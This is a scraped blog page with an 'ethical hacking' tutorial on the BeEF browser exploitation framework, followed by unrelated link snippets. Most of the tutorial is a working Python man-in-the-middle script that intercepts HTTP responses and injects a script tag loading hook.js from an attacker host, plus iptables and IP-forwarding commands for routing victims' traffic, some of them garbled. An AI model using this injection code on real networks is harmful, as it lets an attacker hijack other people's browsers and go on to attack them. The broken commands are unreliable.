• Browser Exploitation Framework.
  • Allows us to launch a number of attacks on a hooked target.
  • Targets are hooked once they load Javascript code.
  • Hook code can be placed in an HTML page and share it with a target.
  • Or host page online and send URL to target.

Install the BeEF framework from Github and start the service.

Login in the BeEF website with the changed username and password.

Login in the BeEF Control Panel successfully.

Change the Default index page of Kali Linux and save it.

Browse the Kali website from different computers, then the watch the Control Panel to find something interesting.

Update the injection code in the Python script.

#!/usr/bin/env python

import re

from netfilterqueue import NetfilterQueue

from scapy.layers.inet import TCP, IP

from scapy.packet import Raw

def set_load(packet, load):

    packet[Raw].load = load

    del packet[IP].len

    del packet[IP].chksum

    del packet[TCP].chksum

    return packet

def process_packet(packet):

    scapy_packet = IP(packet.get_payload())

    # scapy_packet.show()

    if scapy_packet.haslayer(Raw) and scapy_packet.haslayer(TCP):

        load = scapy_packet[Raw].load

        if scapy_packet[TCP].dport == 80:

            print("[+] Request")

            load = re.sub(b"Accept-Encoding:.*?\\r\\n", b"", load)

        elif scapy_packet[TCP].sport == 80:

            print("[+] Response")

            injection_code = b'<script src="http://10.0.0.43:3000/hook.js"></script>'

            load = load.replace(b"</body>", injection_code + b"</body>")

            content_length_search = re.search(b"(?:Content-Length:\s)(\d*)", load)

            if content_length_search and b"text/html" in load:

                print(content_length_search)

                content_length = content_length_search.group(1)

                new_content_length = int(content_length) + len(injection_code)

                load = load.replace(content_length, str(new_content_length).encode())

        if load != scapy_packet[Raw].load:

            print("Payload")

            new_packet = set_load(scapy_packet, load)

            packet.set_payload(str(new_packet).encode())

    packet.accept()

queue = NetfilterQueue()

queue.bind(0, process_packet)

try:

    queue.run()

except KeyboardInterrupt:

    print('')

Execute the following commands on Kali Linux.

iptables --flush

iptablse -I FORWARD -j NFQUEUE --queue-num

echo  > /proc/sys/net/ipv4/ip_forward

Login the BeEF Control Panel, and go to the Commands page.

Python Ethical Hacking - BeEF Framework(1)的更多相关文章

  1. Python Ethical Hacking - BeEF Framework(2)

    Basic BeEF commands: Login the BeEF Control Panel, and go to Commands page. Create Alert Dialog: Run ...

  2. Python Ethical Hacking - VULNERABILITY SCANNER(6)

    EXPLOITATION - XSS VULNS EXPLOITING XSS Run any javascript code. Beef framework can be used to hook ...

  3. Python Ethical Hacking - BACKDOORS(8)

    Cross-platform hacking All programs we wrote are pure python programs They do not rely on OS-specifi ...

  4. Python Ethical Hacking - ARP Spoofing

    Typical Network ARP Spoofing Why ARP Spoofing is possible: 1. Clients accept responses even if they ...

  5. Python Ethical Hacking - NETWORK_SCANNER(2)

    DICTIONARIES Similar to lists but use key instead of an index. LISTS List of values/elements, all ca ...

  6. Python Ethical Hacking - NETWORK_SCANNER(1)

    NETWORK_SCANNER Discover all devices on the network. Display their IP address. Display their MAC add ...

  7. Python Ethical Hacking - MAC Address & How to Change(3)

    SIMPLE ALGORITHM Goal  -> Check if MAC address was changed. Steps: 1. Execute and read ifconfig. ...

  8. Python Ethical Hacking - MAC Address & How to Change(2)

    FUNCTIONS Set of instructions to carry out a task. Can take input, and return a result. Make the cod ...

  9. Python Ethical Hacking - MAC Address & How to Change(1)

    MAC ADDRESS Media Access Control Permanent Physical Unique Assigned by manufacturer WHY CHANGE THE M ...

随机推荐

  1. ULVAC爱发科皮拉尼真空计SW1-N说明书-手册

    ULVAC爱发科皮拉尼真空计SW1-N1/N2/N SWP-16-N/传感器单元规管 https://wenku.baidu.com/view/cff03803a6c30c2259019ef5.htm ...

  2. 数据库事务(1)----- JDBC事务与JTA事务

    数据库事务(一)- JDBC事务与JTA事务 本文主要对JDBC事务与JTA事务做一个简单介绍. 1. 数据库事务概念 一个数据库事务通常包含对数据库进行读或写的一个操作序列.它的存在包含有以下两个目 ...

  3. 详述@Responsebody和HTTP异步请求的关系

    Map.ModelAndView.User.List等对象都可以作为返回值.上述这两种对象都可以使用此注解.使用此注解即表示是在同一次请求的响应体里返回.浏览器以异步http的方式来接收.比如后端的M ...

  4. Flutter开发初探

    目前跨端开发比较热门的就是 React Native 和 Flutter 了,到底该选哪门技术似乎也快成了大前端圈的一个热门话题.对于web前端来说,基于web生态的 React Native 应该是 ...

  5. pikachu靶场-XSS

    .Tips: 一般查询接口容易出现反射型XSS,留言板容易出现存储型XSS 由于后台可能存在过滤措施,构造的script可能会被过滤掉,而无法生效,或者环境限制了执行(浏览器): 通过变化不同的scr ...

  6. java List的初始化

    今天在处理生成excel的时候用到了java的list,但是需要直接赋值固定的几个变量,如果先初始化然后add的方法: List<String> name = new ArrayList( ...

  7. 强大的 actuator 服务监控与管理

    SpringBoot 是为了简化 Spring 应用的创建.运行.调试.部署等一系列问题而诞生的产物,自动装配的特性让我们可以更好的关注业务本身而不是外部的XML配置,我们只需遵循规范,引入相关的依赖 ...

  8. html实体引用

    原义字符 等价字符引用 < < > > " " ' &apos; & &

  9. Java基础-网络编程1

    网络编程 Socket 基本概念 C/S结构 :全称为Client/Server结构,是指客户端和服务器结构.常见程序有QQ.迅雷等软件. B/S结构 :全称为Browser/Server结构,是指浏 ...

  10. HDU - 5963 朋友(思维题)

    题干 B君在围观一群男生和一群女生玩游戏,具体来说游戏是这样的: 给出一棵n个节点的树,这棵树的每条边有一个权值,这个权值只可能是0或1. 在一局游戏开始时,会确定一个节点作为根.接下来从女生开始,双 ...